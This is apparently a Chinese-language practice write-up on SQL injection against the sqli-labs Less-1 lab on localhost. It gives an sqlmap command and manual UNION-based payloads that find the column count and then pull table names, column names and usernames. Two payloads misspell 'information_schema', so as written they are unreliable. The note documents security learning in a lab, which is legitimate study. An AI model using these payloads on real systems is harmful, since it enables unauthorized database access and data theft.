select name, password from table where id = 14 limit 0,1
sqlmap成功了。
sqlmap -u "http://127.0.0.1:80/Less-1/?id=14" --dbs --random-agent --no-cast --batch -v 3
但是还是手工更能学到东西,手注。
1、确定注入参数是字符型还是数字型注入
这个参数有引号围着,那不用说了,字符型的。
2、确定字段数
这里我尝试了
?id=14' order by 4 --(空格) 没得反应给我
?id=14' order by 4 # 也没得反应给我
看了博客才知道
?id=14' order by 4 --+才是可以用来检测字段数的。
这就是注释的fuzz重要性啊......
把注释的方式都试一遍,才可以说,注释没得用。
3、数据表
payload:
union select 1,(select group_concat(table_name) from information_shcema.tables where table_schema=database()),3 --+
4、列数据
union select 1,(select group_concat(column_name) from information_shcema.columns where table_name='users'),3 --+
5、获取想要的数据
union select 1,(select group_concat(username) from users),3 --+